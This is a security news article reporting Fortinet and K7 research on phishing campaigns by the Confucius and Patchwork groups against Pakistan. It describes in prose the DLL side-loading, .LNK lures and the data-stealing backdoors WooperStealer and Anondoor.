The threat actor known as Confucius has been attributed to a new phishing campaign that has targeted Pakistan with malware families like WooperStealer and Anondoor.
“Over the past decade, Confucius has repeatedly targeted government agencies, military organizations, defense contractors, and critical industries — especially in Pakistan – using spear-phishing and malicious documents as initial access vectors,” Fortinet FortiGuard Labs researcher Cara Lin said.
Confucius is a long-running hacking group that’s believed to have been active since 2013 and operating across South Asia. Recent campaigns undertaken by the threat actor have employed a Python-based backdoor called Anondoor, signaling an evolution of the group’s tradecraft and its technical agility.
One of the attack chains documented by Fortinet targeted users in Pakistan sometime in December 2024, tricking recipients into opening a .PPSX file, which then triggers the delivery of WooperStealer using DLL side-loading techniques.
A subsequent attack wave observed in March 2025 has been found to employ Windows shortcut (.LNK) files to unleash the malicious WooperStealer DLL, again launched using DLL side-loading, to steal sensitive data from compromised hosts.
Another .LNK file spotted in August 2025 also leveraged similar tactics to sideload a rogue DLL, only this time the DLL paves the way for Anondoor, a Python implant that’s designed to exfiltrate device information to an external server and await further tasks to execute commands, take screenshots, enumerate files and directories, and dump passwords from Google Chrome.
It’s worth noting that the threat actor’s use of Anondoor was documented in July 2025 by Seebug’s KnownSec 404 Team.
“The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities,” Fortinet said. “Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness.”
The disclosure comes as K7 Security Labs detailed an infection sequence associated with the Patchwork group that commences with a malicious macro that’s designed to download a .LNK file containing PowerShell code responsible for downloading additional payloads and leveraging DLL side-loading to launch the primary malware while simultaneously displaying a decoy PDF document.
The final payload, for its part, establishes contact with the threat actor’s command-and-control (C2) server, gathers system information, and retrieves an encoded instruction that’s subsequently decrypted for execution using cmd.exe. It’s also equipped to take screenshots, upload files from the machine, and download files from a remote URL and save them locally in a temporary directory.
“The malware waits for a configurable period and retries sending the data up to 20 times, tracking failures to ensure persistent and stealthy data exfiltration without alerting the user or security systems,” the company said.
